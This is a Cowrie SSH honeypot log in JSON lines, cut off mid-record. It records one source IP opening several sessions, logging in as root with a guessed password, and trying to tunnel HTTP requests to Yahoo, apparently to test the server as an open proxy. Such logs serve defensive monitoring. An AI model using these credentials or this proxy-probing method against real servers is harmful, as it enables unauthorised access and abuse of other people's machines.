{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45403,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e3f75567b0","protocol":"ssh","message":"New connection: 213.209.150.239:45403 (1.2.3.4:22) [session: 07e3f75567b0]","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.596670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.597526Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.654225Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.936763Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4001,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4001","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.994882Z","session":"07e3f75567b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.051567Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14171,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14171","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.206998Z","session":"07e3f75567b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.263737Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.320903Z","src_ip":"213.209.150.239","session":"07e3f75567b0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45463,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c4c39d0e612","protocol":"ssh","message":"New connection: 213.209.150.239:45463 (1.2.3.4:22) [session: 6c4c39d0e612]","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.366969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.367749Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.414972Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.649642Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11322,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11322","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.697670Z","session":"6c4c39d0e612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.745701Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28307,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28307","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.881739Z","session":"6c4c39d0e612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.928946Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:07.976879Z","src_ip":"213.209.150.239","session":"6c4c39d0e612"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45532,"dst_ip":"1.2.3.4","dst_port":22,"session":"757da7b75d1a","protocol":"ssh","message":"New connection: 213.209.150.239:45532 (1.2.3.4:22) [session: 757da7b75d1a]","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.032854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.041455Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.090607Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.372193Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":7901,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7901","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.429987Z","session":"757da7b75d1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.486615Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2638,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2638","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.642958Z","session":"757da7b75d1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.699654Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.756840Z","src_ip":"213.209.150.239","session":"757da7b75d1a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45645,"dst_ip":"1.2.3.4","dst_port":22,"session":"179d43dd1051","protocol":"ssh","message":"New connection: 213.209.150.239:45645 (1.2.3.4:22) [session: 179d43dd1051]","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.813246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.813781Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:08.870304Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.152080Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":31126,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31126","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.209526Z","session":"179d43dd1051"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.266474Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14884,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14884","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.422881Z","session":"179d43dd1051"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.479390Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.537034Z","src_ip":"213.209.150.239","session":"179d43dd1051"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45725,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8ed55d73240","protocol":"ssh","message":"New connection: 213.209.150.239:45725 (1.2.3.4:22) [session: d8ed55d73240]","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.583298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.584367Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.631491Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.866540Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":24276,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24276","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.914438Z","session":"d8ed55d73240"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:09.963344Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23308,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23308","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.097502Z","session":"d8ed55d73240"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.144675Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.192595Z","src_ip":"213.209.150.239","session":"d8ed55d73240"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45772,"dst_ip":"1.2.3.4","dst_port":22,"session":"6388ac4c5964","protocol":"ssh","message":"New connection: 213.209.150.239:45772 (1.2.3.4:22) [session: 6388ac4c5964]","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.238892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.240093Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ct